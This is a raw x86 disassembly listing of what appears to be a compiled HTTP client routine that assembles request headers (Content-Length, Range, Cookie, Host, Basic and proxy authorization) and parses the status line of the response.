0041D14C push eax
0041D14D lea eax, dword ptr [ebp-34h]
0041D150 push eax
0041D151 lea eax, dword ptr [ebp-38h]
0041D154 push eax
0041D155 lea ecx, dword ptr [ebp-20h]
0041D158 lea edx, dword ptr [ebp-1Ch]
0041D15B mov eax, ebx
0041D15D call 00415290h
0041D162 cmp dword ptr [ebp-20h], 00000000h
0041D166 jne 0041D184h
0041D168 lea eax, dword ptr [ebp-20h]
0041D16B mov edx, dword ptr [ebp-04h]
0041D16E mov edx, dword ptr [edx+14h]
0041D171 call 00404474h
0041D176 lea eax, dword ptr [ebp-24h]
0041D179 mov edx, dword ptr [ebp-04h]
0041D17C mov edx, dword ptr [edx+18h]
0041D17F call 00404474h
0041D184 lea edx, dword ptr [ebp-54h] xrefs 0041D166
0041D187 mov eax, dword ptr [ebp-1Ch]
0041D18A call 00407284h
0041D18F mov eax, dword ptr [ebp-54h]
0041D192 mov edx, 0041DE54h ASCII "HTTPS"
0041D197 call 004047C4h
0041D19C jne 0041D202h
0041D19E mov eax, dword ptr [ebp-04h]
0041D1A1 cmp dword ptr [eax+48h], 00000000h
0041D1A5 setne bl
0041D1A8 mov eax, dword ptr [ebp-04h]
0041D1AB mov eax, dword ptr [eax+1Ch]
0041D1AE add eax, 00000204h
0041D1B3 mov edx, dword ptr [ebp-04h]
0041D1B6 mov edx, dword ptr [edx+48h]
0041D1B9 call 00404430h
0041D1BE mov eax, dword ptr [ebp-04h]
0041D1C1 mov eax, dword ptr [eax+1Ch]
0041D1C4 add eax, 00000208h
0041D1C9 mov edx, dword ptr [ebp-04h]
0041D1CC mov edx, dword ptr [edx+4Ch]
0041D1CF call 00404430h
0041D1D4 mov eax, dword ptr [ebp-04h]
0041D1D7 mov eax, dword ptr [eax+1Ch]
0041D1DA add eax, 00000218h
0041D1DF mov edx, dword ptr [ebp-04h]
0041D1E2 mov edx, dword ptr [edx+50h]
0041D1E5 call 00404430h
0041D1EA mov eax, dword ptr [ebp-04h]
0041D1ED mov eax, dword ptr [eax+1Ch]
0041D1F0 add eax, 0000021Ch
0041D1F5 mov edx, dword ptr [ebp-04h]
0041D1F8 mov edx, dword ptr [edx+54h]
0041D1FB call 00404430h
0041D200 jmp 0041D244h
0041D202 xor ebx, ebx xrefs 0041D19C
0041D204 mov eax, dword ptr [ebp-04h]
0041D207 mov eax, dword ptr [eax+1Ch]
0041D20A add eax, 00000204h
0041D20F call 004043DCh
0041D214 mov eax, dword ptr [ebp-04h]
0041D217 mov eax, dword ptr [eax+1Ch]
0041D21A add eax, 00000208h
0041D21F call 004043DCh
0041D224 mov eax, dword ptr [ebp-04h]
0041D227 mov eax, dword ptr [eax+1Ch]
0041D22A add eax, 00000218h
0041D22F call 004043DCh
0041D234 mov eax, dword ptr [ebp-04h]
0041D237 mov eax, dword ptr [eax+1Ch]
0041D23A add eax, 0000021Ch
0041D23F call 004043DCh
0041D244 mov eax, dword ptr [ebp-04h] xrefs 0041D200
0041D247 cmp dword ptr [eax+48h], 00000000h
0041D24B je 0041D251h
0041D24D test bl, bl
0041D24F je 0041D255h
0041D251 xor eax, eax xrefs 0041D24B
0041D253 jmp 0041D257h
0041D255 mov al, 01h xrefs 0041D24F
0041D257 mov byte ptr [ebp-45h], al xrefs 0041D253
0041D25A mov eax, dword ptr [ebp-04h]
0041D25D mov eax, dword ptr [eax+30h]
0041D260 mov edx, dword ptr [eax]
0041D262 call dword ptr [edx]
0041D264 cmp edx, 00000000h
0041D267 jne 0041D271h
0041D269 cmp eax, 00000000h
0041D26C setnbe al
0041D26F jmp 0041D274h
0041D271 setnle al xrefs 0041D267
0041D274 mov byte ptr [ebp-0Ah], al xrefs 0041D26F
0041D277 mov eax, dword ptr [ebp-04h]
0041D27A mov al, byte ptr [eax+44h]
0041D27D and al, byte ptr [ebp-0Ah]
0041D280 je 0041D294h
0041D282 mov eax, dword ptr [ebp-04h]
0041D285 mov eax, dword ptr [eax+38h]
0041D288 mov edx, 0041DE64h ASCII "1.1"
0041D28D call 004047C4h
0041D292 je 0041D298h
0041D294 xor eax, eax xrefs 0041D280
0041D296 jmp 0041D29Ah
0041D298 mov al, 01h xrefs 0041D292
0041D29A mov byte ptr [ebp-0Bh], al xrefs 0041D296
0041D29D cmp byte ptr [ebp-0Bh], 00000000h
0041D2A1 je 0041D2B5h
0041D2A3 mov eax, dword ptr [ebp-04h]
0041D2A6 mov eax, dword ptr [eax+2Ch]
0041D2A9 mov ecx, 0041DE70h ASCII "Expect: 100-continue"
0041D2AE xor edx, edx
0041D2B0 mov ebx, dword ptr [eax]
0041D2B2 call dword ptr [ebx+60h]
0041D2B5 cmp byte ptr [ebp-0Ah], 00000000h xrefs 0041D2A1
0041D2B9 je 0041D31Bh
0041D2BB mov eax, dword ptr [ebp-04h]
0041D2BE mov eax, dword ptr [eax+30h]
0041D2C1 mov edx, dword ptr [eax]
0041D2C3 call dword ptr [edx]
0041D2C5 push edx
0041D2C6 push eax
0041D2C7 lea eax, dword ptr [ebp-5Ch]
0041D2CA call 004075B8h
0041D2CF mov ecx, dword ptr [ebp-5Ch]
0041D2D2 lea eax, dword ptr [ebp-58h]
0041D2D5 mov edx, 0041DE90h ASCII "Content-Length: "
0041D2DA call 004046C4h
0041D2DF mov ecx, dword ptr [ebp-58h]
0041D2E2 mov eax, dword ptr [ebp-04h]
0041D2E5 mov eax, dword ptr [eax+2Ch]
0041D2E8 xor edx, edx
0041D2EA mov ebx, dword ptr [eax]
0041D2EC call dword ptr [ebx+60h]
0041D2EF mov eax, dword ptr [ebp-04h]
0041D2F2 cmp dword ptr [eax+34h], 00000000h
0041D2F6 je 0041D31Bh
0041D2F8 mov eax, dword ptr [ebp-04h]
0041D2FB mov ecx, dword ptr [eax+34h]
0041D2FE lea eax, dword ptr [ebp-60h]
0041D301 mov edx, 0041DEACh ASCII "Content-Type: "
0041D306 call 004046C4h
0041D30B mov ecx, dword ptr [ebp-60h]
0041D30E mov eax, dword ptr [ebp-04h]
0041D311 mov eax, dword ptr [eax+2Ch]
0041D314 xor edx, edx
0041D316 mov ebx, dword ptr [eax]
0041D318 call dword ptr [ebx+60h]
0041D31B mov eax, dword ptr [ebp-04h] xrefs 0041D2B9, 0041D2F6
0041D31E cmp dword ptr [eax+60h], 00000000h
0041D322 je 0041D347h
0041D324 mov eax, dword ptr [ebp-04h]
0041D327 mov ecx, dword ptr [eax+60h]
0041D32A lea eax, dword ptr [ebp-64h]
0041D32D mov edx, 0041DEC4h ASCII "User-Agent: "
0041D332 call 004046C4h
0041D337 mov ecx, dword ptr [ebp-64h]
0041D33A mov eax, dword ptr [ebp-04h]
0041D33D mov eax, dword ptr [eax+2Ch]
0041D340 xor edx, edx
0041D342 mov ebx, dword ptr [eax]
0041D344 call dword ptr [ebx+60h]
0041D347 mov eax, dword ptr [ebp-04h] xrefs 0041D322
0041D34A mov ebx, dword ptr [eax+70h]
0041D34D test ebx, ebx
0041D34F jnle 0041D35Eh
0041D351 mov eax, dword ptr [ebp-04h]
0041D354 cmp dword ptr [eax+74h], 00000000h
0041D358 jng 0041D3E1h
0041D35E mov eax, dword ptr [ebp-04h] xrefs 0041D34F
0041D361 cmp ebx, dword ptr [eax+74h]
0041D364 jnle 0041D3ADh
0041D366 push 0041DEDCh ASCII "Range: bytes="
0041D36B lea edx, dword ptr [ebp-6Ch]
0041D36E mov eax, ebx
0041D370 call 004074CCh
0041D375 push dword ptr [ebp-6Ch]
0041D378 push 0041DEF4h
0041D37D lea edx, dword ptr [ebp-70h]
0041D380 mov eax, dword ptr [ebp-04h]
0041D383 mov eax, dword ptr [eax+74h]
0041D386 call 004074CCh
0041D38B push dword ptr [ebp-70h]
0041D38E lea eax, dword ptr [ebp-68h]
0041D391 mov edx, 00000004h
0041D396 call 00404738h
0041D39B mov ecx, dword ptr [ebp-68h]
0041D39E mov eax, dword ptr [ebp-04h]
0041D3A1 mov eax, dword ptr [eax+2Ch]
0041D3A4 xor edx, edx
0041D3A6 mov ebx, dword ptr [eax]
0041D3A8 call dword ptr [ebx+60h]
0041D3AB jmp 0041D3E1h
0041D3AD push 0041DEDCh ASCII "Range: bytes=" xrefs 0041D364
0041D3B2 lea edx, dword ptr [ebp-78h]
0041D3B5 mov eax, ebx
0041D3B7 call 004074CCh
0041D3BC push dword ptr [ebp-78h]
0041D3BF push 0041DEF4h
0041D3C4 lea eax, dword ptr [ebp-74h]
0041D3C7 mov edx, 00000003h
0041D3CC call 00404738h
0041D3D1 mov ecx, dword ptr [ebp-74h]
0041D3D4 mov eax, dword ptr [ebp-04h]
0041D3D7 mov eax, dword ptr [eax+2Ch]
0041D3DA xor edx, edx
0041D3DC mov ebx, dword ptr [eax]
0041D3DE call dword ptr [ebx+60h]
0041D3E1 lea eax, dword ptr [ebp-3Ch] xrefs 0041D3AB, 0041D358
0041D3E4 call 004043DCh
0041D3E9 mov eax, dword ptr [ebp-04h]
0041D3EC mov eax, dword ptr [eax+64h]
0041D3EF mov edx, dword ptr [eax]
0041D3F1 call dword ptr [edx+14h]
0041D3F4 mov ebx, eax
0041D3F6 dec ebx
0041D3F7 test ebx, ebx
0041D3F9 jl 0041D430h
0041D3FB inc ebx
0041D3FC xor esi, esi
0041D3FE cmp dword ptr [ebp-3Ch], 00000000h xrefs 0041D42E
0041D402 je 0041D411h
0041D404 lea eax, dword ptr [ebp-3Ch]
0041D407 mov edx, 0041DF00h
0041D40C call 00404680h
0041D411 lea ecx, dword ptr [ebp-7Ch] xrefs 0041D402
0041D414 mov eax, dword ptr [ebp-04h]
0041D417 mov eax, dword ptr [eax+64h]
0041D41A mov edx, esi
0041D41C mov edi, dword ptr [eax]
0041D41E call dword ptr [edi+0Ch]
0041D421 mov edx, dword ptr [ebp-7Ch]
0041D424 lea eax, dword ptr [ebp-3Ch]
0041D427 call 00404680h
0041D42C inc esi
0041D42D dec ebx
0041D42E jne 0041D3FEh
0041D430 cmp dword ptr [ebp-3Ch], 00000000h xrefs 0041D3F9
0041D434 je 0041D456h
0041D436 lea eax, dword ptr [ebp-80h]
0041D439 mov ecx, dword ptr [ebp-3Ch]
0041D43C mov edx, 0041DF0Ch ASCII "Cookie: "
0041D441 call 004046C4h
0041D446 mov ecx, dword ptr [ebp-80h]
0041D449 mov eax, dword ptr [ebp-04h]
0041D44C mov eax, dword ptr [eax+2Ch]
0041D44F xor edx, edx
0041D451 mov ebx, dword ptr [eax]
0041D453 call dword ptr [ebx+60h]
0041D456 lea eax, dword ptr [ebp-44h] xrefs 0041D434
0041D459 call 004043DCh
0041D45E cmp byte ptr [ebp-45h], 00000000h
0041D462 je 0041D471h
0041D464 lea eax, dword ptr [ebp-44h]
0041D467 mov edx, 0041DF20h ASCII "Proxy-"
0041D46C call 00404474h
0041D471 mov eax, dword ptr [ebp-04h] xrefs 0041D462
0041D474 cmp byte ptr [eax+3Ch], 00000000h
0041D478 je 0041D4DCh
0041D47A lea eax, dword ptr [ebp-00000084h]
0041D480 mov ecx, 0041DF30h ASCII "Connection: keep-alive"
0041D485 mov edx, dword ptr [ebp-44h]
0041D488 call 004046C4h
0041D48D mov ecx, dword ptr [ebp-00000084h]
0041D493 mov eax, dword ptr [ebp-04h]
0041D496 mov eax, dword ptr [eax+2Ch]
0041D499 xor edx, edx
0041D49B mov ebx, dword ptr [eax]
0041D49D call dword ptr [ebx+60h]
0041D4A0 lea edx, dword ptr [ebp-0000008Ch]
0041D4A6 mov eax, dword ptr [ebp-04h]
0041D4A9 mov eax, dword ptr [eax+40h]
0041D4AC call 004074CCh
0041D4B1 mov ecx, dword ptr [ebp-0000008Ch]
0041D4B7 lea eax, dword ptr [ebp-00000088h]
0041D4BD mov edx, 0041DF50h ASCII "Keep-Alive: "
0041D4C2 call 004046C4h
0041D4C7 mov ecx, dword ptr [ebp-00000088h]
0041D4CD mov eax, dword ptr [ebp-04h]
0041D4D0 mov eax, dword ptr [eax+2Ch]
0041D4D3 xor edx, edx
0041D4D5 mov ebx, dword ptr [eax]
0041D4D7 call dword ptr [ebx+60h]
0041D4DA jmp 0041D502h
0041D4DC lea eax, dword ptr [ebp-00000090h] xrefs 0041D478
0041D4E2 mov ecx, 0041DF68h ASCII "Connection: close"
0041D4E7 mov edx, dword ptr [ebp-44h]
0041D4EA call 004046C4h
0041D4EF mov ecx, dword ptr [ebp-00000090h]
0041D4F5 mov eax, dword ptr [ebp-04h]
0041D4F8 mov eax, dword ptr [eax+2Ch]
0041D4FB xor edx, edx
0041D4FD mov ebx, dword ptr [eax]
0041D4FF call dword ptr [ebx+60h]
0041D502 cmp dword ptr [ebp-20h], 00000000h xrefs 0041D4DA
0041D506 je 0041D55Dh
0041D508 push dword ptr [ebp-20h]
0041D50B push 0041DF84h
0041D510 push dword ptr [ebp-24h]
0041D513 lea eax, dword ptr [ebp-0000009Ch]
0041D519 mov edx, 00000003h
0041D51E call 00404738h
0041D523 mov eax, dword ptr [ebp-0000009Ch]
0041D529 lea edx, dword ptr [ebp-00000098h]
0041D52F call 00415E2Ch
0041D534 mov ecx, dword ptr [ebp-00000098h]
0041D53A lea eax, dword ptr [ebp-00000094h]
0041D540 mov edx, 0041DF90h ASCII "Authorization: Basic "
0041D545 call 004046C4h
0041D54A mov ecx, dword ptr [ebp-00000094h]
0041D550 mov eax, dword ptr [ebp-04h]
0041D553 mov eax, dword ptr [eax+2Ch]
0041D556 xor edx, edx
0041D558 mov ebx, dword ptr [eax]
0041D55A call dword ptr [ebx+60h]
0041D55D cmp byte ptr [ebp-45h], 00000000h xrefs 0041D506
0041D561 je 0041D5C7h
0041D563 mov eax, dword ptr [ebp-04h]
0041D566 cmp dword ptr [eax+50h], 00000000h
0041D56A je 0041D5C7h
0041D56C mov eax, dword ptr [ebp-04h]
0041D56F push dword ptr [eax+50h]
0041D572 push 0041DF84h
0041D577 mov eax, dword ptr [ebp-04h]
0041D57A push dword ptr [eax+54h]
0041D57D lea eax, dword ptr [ebp-000000A8h]
0041D583 mov edx, 00000003h
0041D588 call 00404738h
0041D58D mov eax, dword ptr [ebp-000000A8h]
0041D593 lea edx, dword ptr [ebp-000000A4h]
0041D599 call 00415E2Ch
0041D59E mov ecx, dword ptr [ebp-000000A4h]
0041D5A4 lea eax, dword ptr [ebp-000000A0h]
0041D5AA mov edx, 0041DFB0h ASCII "Proxy-Authorization: Basic "
0041D5AF call 004046C4h
0041D5B4 mov ecx, dword ptr [ebp-000000A0h]
0041D5BA mov eax, dword ptr [ebp-04h]
0041D5BD mov eax, dword ptr [eax+2Ch]
0041D5C0 xor edx, edx
0041D5C2 mov ebx, dword ptr [eax]
0041D5C4 call dword ptr [ebx+60h]
0041D5C7 mov eax, dword ptr [ebp-28h] xrefs 0041D561, 0041D56A
0041D5CA call 00415FD8h
0041D5CF test al, al
0041D5D1 je 0041D5EFh
0041D5D3 push 0041DFD4h
0041D5D8 push dword ptr [ebp-28h]
0041D5DB push 0041DFE0h
0041D5E0 lea eax, dword ptr [ebp-3Ch]
0041D5E3 mov edx, 00000003h
0041D5E8 call 00404738h
0041D5ED jmp 0041D5FAh
0041D5EF lea eax, dword ptr [ebp-3Ch] xrefs 0041D5D1
0041D5F2 mov edx, dword ptr [ebp-28h]
0041D5F5 call 00404474h
0041D5FA mov eax, dword ptr [ebp-04h] xrefs 0041D5ED
0041D5FD cmp byte ptr [eax+78h], 00000000h
0041D601 je 0041D647h
0041D603 mov eax, dword ptr [ebp-2Ch]
0041D606 mov edx, 0041DFECh
0041D60B call 004047C4h
0041D610 je 0041D647h
0041D612 push 0041DFF8h ASCII "Host: "
0041D617 push dword ptr [ebp-3Ch]
0041D61A push 0041DF84h
0041D61F push dword ptr [ebp-2Ch]
0041D622 lea eax, dword ptr [ebp-000000ACh]
0041D628 mov edx, 00000004h
0041D62D call 00404738h
0041D632 mov ecx, dword ptr [ebp-000000ACh]
0041D638 mov eax, dword ptr [ebp-04h]
0041D63B mov eax, dword ptr [eax+2Ch]
0041D63E xor edx, edx
0041D640 mov ebx, dword ptr [eax]
0041D642 call dword ptr [ebx+60h]
0041D645 jmp 0041D66Dh
0041D647 lea eax, dword ptr [ebp-000000B0h] xrefs 0041D601, 0041D610
0041D64D mov ecx, dword ptr [ebp-3Ch]
0041D650 mov edx, 0041DFF8h ASCII "Host: "
0041D655 call 004046C4h
0041D65A mov ecx, dword ptr [ebp-000000B0h]
0041D660 mov eax, dword ptr [ebp-04h]
0041D663 mov eax, dword ptr [eax+2Ch]
0041D666 xor edx, edx
0041D668 mov ebx, dword ptr [eax]
0041D66A call dword ptr [ebx+60h]
0041D66D cmp byte ptr [ebp-45h], 00000000h xrefs 0041D645
0041D671 je 0041D696h
0041D673 push dword ptr [ebp-1Ch]
0041D676 push 0041E008h ASCII "://"
0041D67B push dword ptr [ebp-3Ch]
0041D67E push 0041DF84h
0041D683 push dword ptr [ebp-2Ch]
0041D686 push dword ptr [ebp-38h]
0041D689 lea eax, dword ptr [ebp-38h]
0041D68C mov edx, 00000006h
0041D691 call 00404738h
0041D696 mov eax, dword ptr [ebp-38h] xrefs 0041D671
0041D699 mov edx, 0041E014h
0041D69E call 004047C4h
0041D6A3 jne 0041D6B2h
0041D6A5 lea eax, dword ptr [ebp-38h]
0041D6A8 mov edx, 0041E020h
0041D6AD call 00404474h
0041D6B2 mov eax, dword ptr [ebp-04h] xrefs 0041D6A3
0041D6B5 mov eax, dword ptr [eax+38h]
0041D6B8 mov edx, 0041E02Ch ASCII "0.9"
0041D6BD call 004047C4h
0041D6C2 jne 0041D705h
0041D6C4 lea edx, dword ptr [ebp-000000B8h]
0041D6CA mov eax, dword ptr [ebp-08h]
0041D6CD call 00407284h
0041D6D2 push dword ptr [ebp-000000B8h]
0041D6D8 push 0041E038h
0041D6DD push dword ptr [ebp-38h]
0041D6E0 lea eax, dword ptr [ebp-000000B4h]
0041D6E6 mov edx, 00000003h
0041D6EB call 00404738h
0041D6F0 mov ecx, dword ptr [ebp-000000B4h]
0041D6F6 mov eax, dword ptr [ebp-04h]
0041D6F9 mov eax, dword ptr [eax+2Ch]
0041D6FC xor edx, edx
0041D6FE mov ebx, dword ptr [eax]
0041D700 call dword ptr [ebx+60h]
0041D703 jmp 0041D74Fh
0041D705 lea edx, dword ptr [ebp-000000C0h] xrefs 0041D6C2
0041D70B mov eax, dword ptr [ebp-08h]
0041D70E call 00407284h
0041D713 push dword ptr [ebp-000000C0h]
0041D719 push 0041E038h
0041D71E push dword ptr [ebp-38h]
0041D721 push 0041E044h ASCII " HTTP/"
0041D726 mov eax, dword ptr [ebp-04h]
0041D729 push dword ptr [eax+38h]
0041D72C lea eax, dword ptr [ebp-000000BCh]
0041D732 mov edx, 00000005h
0041D737 call 00404738h
0041D73C mov ecx, dword ptr [ebp-000000BCh]
0041D742 mov eax, dword ptr [ebp-04h]
0041D745 mov eax, dword ptr [eax+2Ch]
0041D748 xor edx, edx
0041D74A mov ebx, dword ptr [eax]
0041D74C call dword ptr [ebx+60h]
0041D74F cmp byte ptr [ebp-45h], 00000000h xrefs 0041D703
0041D753 je 0041D779h
0041D755 mov eax, dword ptr [ebp-04h]
0041D758 add eax, 04h
0041D75B mov edx, dword ptr [ebp-04h]
0041D75E mov edx, dword ptr [edx+48h]
0041D761 call 00404430h
0041D766 mov eax, dword ptr [ebp-04h]
0041D769 add eax, 08h
0041D76C mov edx, dword ptr [ebp-04h]
0041D76F mov edx, dword ptr [edx+4Ch]
0041D772 call 00404430h
0041D777 jmp 0041D795h
0041D779 mov eax, dword ptr [ebp-04h] xrefs 0041D753
0041D77C add eax, 04h
0041D77F mov edx, dword ptr [ebp-28h]
0041D782 call 00404430h
0041D787 mov eax, dword ptr [ebp-04h]
0041D78A add eax, 08h
0041D78D mov edx, dword ptr [ebp-2Ch]
0041D790 call 00404430h
0041D795 mov eax, dword ptr [ebp-04h] xrefs 0041D777
0041D798 mov ebx, dword ptr [eax+2Ch]
0041D79B mov eax, ebx
0041D79D mov edx, dword ptr [eax]
0041D79F call dword ptr [edx+14h]
0041D7A2 mov edx, eax
0041D7A4 dec edx
0041D7A5 lea ecx, dword ptr [ebp-000000C4h]
0041D7AB mov eax, ebx
0041D7AD mov ebx, dword ptr [eax]
0041D7AF call dword ptr [ebx+0Ch]
0041D7B2 cmp dword ptr [ebp-000000C4h], 00000000h
0041D7B9 je 0041D7C8h
0041D7BB mov eax, dword ptr [ebp-04h]
0041D7BE mov eax, dword ptr [eax+2Ch]
0041D7C1 xor edx, edx
0041D7C3 mov ecx, dword ptr [eax]
0041D7C5 call dword ptr [ecx+38h]
0041D7C8 lea edx, dword ptr [ebp-000000C8h] xrefs 0041D7B9
0041D7CE mov eax, dword ptr [ebp-1Ch]
0041D7D1 call 00407284h
0041D7D6 mov eax, dword ptr [ebp-000000C8h]
0041D7DC mov edx, 0041DE54h ASCII "HTTPS"
0041D7E1 call 004047C4h
0041D7E6 sete dl
0041D7E9 mov eax, dword ptr [ebp-04h]
0041D7EC call 0041D08Ch
0041D7F1 test al, al
0041D7F3 jne 0041D810h
0041D7F5 mov eax, dword ptr [ebp-04h]
0041D7F8 add eax, 24h
0041D7FB call 004043DCh
0041D800 mov eax, dword ptr [ebp-04h]
0041D803 add eax, 28h
0041D806 call 004043DCh
0041D80B jmp 0041DE04h
0041D812 push 00000000h Count = 2
0041D814 mov eax, dword ptr [ebp-04h]
0041D817 mov eax, dword ptr [eax+30h]
0041D81A call 00411F4Ch
0041D81F lea eax, dword ptr [ebp-10h]
0041D822 call 004043DCh
0041D827 cmp byte ptr [ebp-0Bh], 00000000h
0041D82B je 0041D91Eh
0041D831 lea edx, dword ptr [ebp-000000CCh]
0041D837 mov eax, dword ptr [ebp-04h]
0041D83A call 0041CF78h
0041D83F mov edx, dword ptr [ebp-000000CCh]
0041D845 mov eax, dword ptr [ebp-04h]
0041D848 mov eax, dword ptr [eax+1Ch]
0041D84B mov ecx, dword ptr [eax]
0041D84D call dword ptr [ecx+24h]
0041D850 mov eax, dword ptr [ebp-04h]
0041D853 mov eax, dword ptr [eax+1Ch]
0041D856 cmp dword ptr [eax+000001B8h], 00000000h
0041D85D jne 0041DE04h
0041D863 lea ecx, dword ptr [ebp-3Ch] xrefs 0041D88A
0041D866 mov eax, dword ptr [ebp-04h]
0041D869 mov edx, dword ptr [eax+10h]
0041D86C mov eax, dword ptr [ebp-04h]
0041D86F mov eax, dword ptr [eax+1Ch]
0041D872 mov ebx, dword ptr [eax]
0041D874 call dword ptr [ebx+50h]
0041D877 cmp dword ptr [ebp-3Ch], 00000000h
0041D87B jne 0041D88Ch
0041D87D mov eax, dword ptr [ebp-04h]
0041D880 mov eax, dword ptr [eax+1Ch]
0041D883 cmp dword ptr [eax+000001B8h], 00000000h
0041D88A je 0041D863h
0041D88C mov edx, dword ptr [ebp-3Ch] xrefs 0041D87B
0041D88F mov eax, dword ptr [ebp-04h]
0041D892 call 0041CEA8h
0041D897 lea eax, dword ptr [ebp-10h]
0041D89A mov edx, dword ptr [ebp-3Ch]
0041D89D call 00404474h
0041D8A2 lea ecx, dword ptr [ebp-3Ch] xrefs 0041D8C9
0041D8A5 mov eax, dword ptr [ebp-04h]
0041D8A8 mov edx, dword ptr [eax+10h]
0041D8AB mov eax, dword ptr [ebp-04h]
0041D8AE mov eax, dword ptr [eax+1Ch]
0041D8B1 mov ebx, dword ptr [eax]
0041D8B3 call dword ptr [ebx+50h]
0041D8B6 cmp dword ptr [ebp-3Ch], 00000000h
0041D8BA je 0041D8CBh
0041D8BC mov eax, dword ptr [ebp-04h]
0041D8BF mov eax, dword ptr [eax+1Ch]
0041D8C2 cmp dword ptr [eax+000001B8h], 00000000h
0041D8C9 je 0041D8A2h
0041D8CB mov eax, dword ptr [ebp-04h] xrefs 0041D8BA
0041D8CE mov eax, dword ptr [eax+58h]
0041D8D1 cmp eax, 64h
0041D8D4 jl 0041DA0Bh
0041D8DA cmp eax, 000000C8h
0041D8DF jnl 0041DA0Bh
0041D8E5 lea eax, dword ptr [ebp-10h]
0041D8E8 call 004043DCh
0041D8ED mov eax, dword ptr [ebp-04h]
0041D8F0 mov eax, dword ptr [eax+30h]
0041D8F3 mov edx, dword ptr [eax]
0041D8F5 call dword ptr [edx]
0041D8F7 mov edx, dword ptr [ebp-04h]
0041D8FA mov dword ptr [edx+6Ch], eax
0041D8FD mov eax, dword ptr [ebp-04h]
0041D900 mov ebx, dword ptr [eax+30h]
0041D903 mov eax, ebx
0041D905 mov edx, dword ptr [eax]
0041D907 call dword ptr [edx]
0041D909 mov ecx, eax
0041D90B mov edx, dword ptr [ebx+04h]
0041D90E mov eax, dword ptr [ebp-04h]
0041D911 mov eax, dword ptr [eax+1Ch]
0041D914 mov ebx, dword ptr [eax]
0041D916 call dword ptr [ebx+1Ch]
0041D919 jmp 0041DA0Bh
0041D91E cmp byte ptr [ebp-0Ah], 00000000h xrefs 0041D82B
0041D922 je 0041D9ECh
0041D928 mov eax, dword ptr [ebp-04h]
0041D92B mov eax, dword ptr [eax+30h]
0041D92E mov edx, dword ptr [eax]
0041D930 call dword ptr [edx]
0041D932 cmp edx, 00000000h
0041D935 jne 0041D940h
0041D937 cmp eax, 00010000h
0041D93C jc 0041D98Fh
0041D93E jmp 0041D942h
0041D940 jl 0041D98Fh xrefs 0041D935
0041D942 lea edx, dword ptr [ebp-000000D0h] xrefs 0041D93E
0041D948 mov eax, dword ptr [ebp-04h]
0041D94B call 0041CF78h
0041D950 mov edx, dword ptr [ebp-000000D0h]
0041D956 mov eax, dword ptr [ebp-04h]
0041D959 mov eax, dword ptr [eax+1Ch]
0041D95C mov ecx, dword ptr [eax]
0041D95E call dword ptr [ecx+24h]
0041D961 mov eax, dword ptr [ebp-04h]
0041D964 mov eax, dword ptr [eax+30h]
0041D967 mov edx, dword ptr [eax]
0041D969 call dword ptr [edx]
0041D96B mov edx, dword ptr [ebp-04h]
0041D96E mov dword ptr [edx+6Ch], eax
0041D971 mov eax, dword ptr [ebp-04h]
0041D974 mov ebx, dword ptr [eax+30h]
0041D977 mov eax, ebx
0041D979 mov edx, dword ptr [eax]
0041D97B call dword ptr [edx]
0041D97D mov ecx, eax
0041D97F mov edx, dword ptr [ebx+04h]
0041D982 mov eax, dword ptr [ebp-04h]
0041D985 mov eax, dword ptr [eax+1Ch]
0041D988 mov ebx, dword ptr [eax]
0041D98A call dword ptr [ebx+1Ch]
0041D98D jmp 0041DA0Bh
0041D98F mov eax, dword ptr [ebp-04h] xrefs 0041D940, 0041D93C
0041D992 mov ebx, dword ptr [eax+30h]
0041D995 mov eax, ebx
0041D997 mov edx, dword ptr [eax]
0041D999 call dword ptr [edx]
0041D99B mov edx, eax
0041D99D lea ecx, dword ptr [ebp-000000D4h]
0041D9A3 mov eax, ebx
0041D9A5 call 00415A60h
0041D9AA mov eax, dword ptr [ebp-000000D4h]
0041D9B0 push eax
0041D9B1 lea edx, dword ptr [ebp-000000D8h]
0041D9B7 mov eax, dword ptr [ebp-04h]
0041D9BA call 0041CF78h
0041D9BF mov edx, dword ptr [ebp-000000D8h]
0041D9C5 lea eax, dword ptr [ebp-3Ch]
0041D9C8 pop ecx
0041D9C9 call 004046C4h
0041D9CE mov eax, dword ptr [ebp-3Ch]
0041D9D1 call 00404678h
0041D9D6 mov edx, dword ptr [ebp-04h]
0041D9D9 mov dword ptr [edx+6Ch], eax
0041D9DC mov eax, dword ptr [ebp-04h]
0041D9DF mov eax, dword ptr [eax+1Ch]
0041D9E2 mov edx, dword ptr [ebp-3Ch]
0041D9E5 mov ecx, dword ptr [eax]
0041D9E7 call dword ptr [ecx+24h]
0041D9EA jmp 0041DA0Bh
0041D9EC lea edx, dword ptr [ebp-000000DCh] xrefs 0041D922
0041D9F2 mov eax, dword ptr [ebp-04h]
0041D9F5 call 0041CF78h
0041D9FA mov edx, dword ptr [ebp-000000DCh]
0041DA00 mov eax, dword ptr [ebp-04h]
0041DA03 mov eax, dword ptr [eax+1Ch]
0041DA06 mov ecx, dword ptr [eax]
0041DA08 call dword ptr [ecx+24h]
0041DA0B mov eax, dword ptr [ebp-04h] xrefs 0041D9EA, 0041D98D, 0041D8D4, 0041D8DF, 0041D919
0041DA0E mov eax, dword ptr [eax+1Ch]
0041DA11 cmp dword ptr [eax+000001B8h], 00000000h
0041DA18 jne 0041DE04h
0041DA1E mov eax, dword ptr [ebp-04h]
0041DA21 call 0041CE68h
0041DA26 mov dword ptr [ebp-18h], FFFFFFFFh
0041DA2D mov eax, dword ptr [ebp-04h]
0041DA30 mov byte ptr [eax+20h], 00000000h
0041DA34 cmp byte ptr [ebp+08h], 00000001h
0041DA38 jne 0041DDE3h
0041DA3E cmp dword ptr [ebp-10h], 00000000h
0041DA42 jne 0041DAEEh
0041DA48 lea ecx, dword ptr [ebp-3Ch] xrefs 0041DAE6, 0041DA6F
0041DA4B mov eax, dword ptr [ebp-04h]
0041DA4E mov edx, dword ptr [eax+10h]
0041DA51 mov eax, dword ptr [ebp-04h]
0041DA54 mov eax, dword ptr [eax+1Ch]
0041DA57 mov ebx, dword ptr [eax]
0041DA59 call dword ptr [ebx+50h]
0041DA5C cmp dword ptr [ebp-3Ch], 00000000h
0041DA60 jne 0041DA71h
0041DA62 mov eax, dword ptr [ebp-04h]
0041DA65 mov eax, dword ptr [eax+1Ch]
0041DA68 cmp dword ptr [eax+000001B8h], 00000000h
0041DA6F je 0041DA48h
0041DA71 lea edx, dword ptr [ebp-000000E0h] xrefs 0041DA60
0041DA77 mov eax, dword ptr [ebp-3Ch]
0041DA7A call 00407284h
0041DA7F mov edx, dword ptr [ebp-000000E0h]
0041DA85 mov eax, 0041E054h ASCII "HTTP/"
0041DA8A call 00404960h
0041DA8F dec eax
0041DA90 jne 0041DAADh
0041DA92 mov eax, dword ptr [ebp-04h]
